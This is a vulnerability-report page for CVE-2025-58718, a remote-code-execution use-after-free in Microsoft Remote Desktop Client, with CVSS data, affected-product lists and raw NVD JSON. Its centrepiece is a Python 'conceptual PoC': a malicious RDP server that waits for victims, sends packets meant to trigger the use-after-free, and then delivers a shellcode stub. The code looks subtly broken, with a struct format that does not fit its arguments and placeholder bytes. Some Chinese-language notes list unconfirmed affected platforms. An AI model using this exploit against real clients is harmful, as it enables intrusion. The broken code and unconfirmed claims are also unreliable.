Security Vulnerability Report
中文
CVE-2025-58718 CVSS 8.8 HIGH

CVE-2025-58718

Published: 2025-10-14 17:15:53
Last Modified: 2025-10-31 15:20:18
Source: [email protected]

Description

Use after free in Remote Desktop Client allows an unauthorized attacker to execute code over a network.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:remote_desktop_client:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:microsoft:windows_app:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
Microsoft Remote Desktop Client for Windows(所有受支持的Windows版本,具体版本需参考微软官方公告)
Microsoft Remote Desktop Client for macOS(受影响版本待确认)
Microsoft Remote Desktop Client for iOS(受影响版本待确认)
Microsoft Remote Desktop Client for Android(受影响版本待确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58718 PoC - Conceptual Proof of Concept # Vulnerability: Use-After-Free in Microsoft Remote Desktop Client # Note: This is a conceptual PoC demonstrating the exploitation approach. # Actual exploitation requires a malicious RDP server infrastructure. import socket import struct import sys # RDP Protocol Constants RDP_PORT = 3389 PROTOCOL_RDP = 0x00000000 class MaliciousRDPServer: """ Conceptual malicious RDP server that triggers CVE-2025-58718 by sending crafted RDP packets to exploit the Use-After-Free vulnerability in the Remote Desktop Client. """ def __init__(self, host='0.0.0.0', port=RDP_PORT): self.host = host self.port = port self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) def craft_udp_packet(self, session_id, payload): """ Craft a malicious RDP packet designed to trigger the use-after-free condition in the client. """ # TPKT Header (4 bytes) tpkt_version = 0x03 tpkt_reserved = 0x00 tpkt_length = 4 + len(payload) # X.224 Connection Confirm header x224_length = ptr = len(payload) x224_type = 0xD0 # CC (Connection Confirm) x224_dst_ref = 0x0000 x224_src_ref = session_id x224_class_option = 0x00 header = struct.pack('>BBHHBx', tpkt_version, tpkt_reserved, tpkt_length, x224_length, x224_type, x224_dst_ref, x224_src_ref ) return header + payload def trigger_uaf(self, client_socket): """ Send crafted packets to trigger the Use-After-Free vulnerability. The exploit works by: 1. Establishing a normal RDP session 2. Triggering object deallocation through specific channel commands 3. Sending follow-up packets that reference the freed object 4. Achieving code execution through controlled heap manipulation """ try: # Step 1: Send initial connection response initial_payload = b'\x00' * 16 client_socket.send(self.craft_udp_packet(0x0001, initial_payload)) # Step 2: Trigger object free via malformed channel definition # This causes the client to free a session resource object free_trigger = b'\x14\x00\x00\x00' + b'\x00' * 12 client_socket.send(self.craft_udp_packet(0x0002, free_trigger)) # Step 3: Send UAF trigger - reference to the freed object # This packet accesses the dangling pointer causing UAF uaf_payload = struct.pack('<I', 0xDEADBEEF) + b'\x90' * 64 client_socket.send(self.craft_udp_packet(0x0003, uaf_payload)) # Step 4: Deliver shellcode via heap spray technique shellcode = b'\xFC\x48\x83\xE4\xF0' # Simple NOP sled + shellcode stub shellcode += b'\x90' * (256 - len(shellcode)) client_socket.send(self.craft_udp_packet(0x0004, shellcode)) except Exception as e: print(f"Exploit error: {e}") def start(self): """Start the malicious RDP server.""" self.server_socket.bind((self.host, self.port)) self.server_socket.listen(5) print(f"[*] Malicious RDP server listening on {self.host}:{self.port}") print(f"[*] Waiting for victim to connect...") while True: client_socket, addr = self.server_socket.accept() print(f"[!] Victim connected from {addr}") self.trigger_uaf(client_socket) if __name__ == "__main__": # WARNING: This PoC is for educational and authorized testing only. # Unauthorized use of this code to exploit systems is illegal. print("=" * 60) print("CVE-2025-58718 - PoC (Conceptual)") print("Use-After-Free in Microsoft Remote Desktop Client") print("=" * 60) server = MaliciousRDPServer() server.start()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58718", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:53.100", "lastModified": "2025-10-31T15:20:17.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Remote Desktop Client allows an unauthorized attacker to execute code over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:remote_desktop_client:*:*:*:*:*:windows:*:*", "versionEndExcluding": "1.2.6599", "matchCriteriaId": "24C15EC7-3A2A-4F9C-881D-F96842A50B27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:windows_app:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.0.706.0", "matchCriteriaId": "38F88598-0BCE-4427-A943-A5A9B4FC7E40"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "030F3214-D6AF-40A9-9FC9-523AC9870581"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "4932CB20-D134-4EDF-8F21-F9D0AF80BFEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "D8145D41-BFB2-47A6-B5E5-1A038A27C1C1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "3EE0CDB1-CBF3-45F2-8F0B-96A9D0757B42"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "E216CD5B-8885-4E17-8718-97E88A724A44"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "36E44227-0320-43B1-A0D9-EB28B25CDB4D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6456", "matchCriteriaId": "1485A427-10FF-4C39-9911-4C6F1820BE7F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6456", "matchCriteriaId": "26CAACAA-3FE8-4740-8CF2-6BF3D069C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22621.6060", "matchCriteriaId": "6F387FA2-66C8-4B70-A537-65806271F16A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.22631.6060", "matchCriteriaId": "4AF873E4-B2FE-4504-BFF0-FC71121FC9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "matchCriteriaId": "2127D10C-B6F3-4C1D-B9AA-5D78513CC996"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "matchCriteriaId": "AB425562-C0A0-452E-AABE-F70522F15E1A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "matchCriteriaId": "AF07A81D-12E5-4B1D-BFF9-C8D08C32FF4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.14393.8519", "matchCriteriaId": "860ADFF9-62D0-425B-9310-99ACFC92EB12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndEx ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.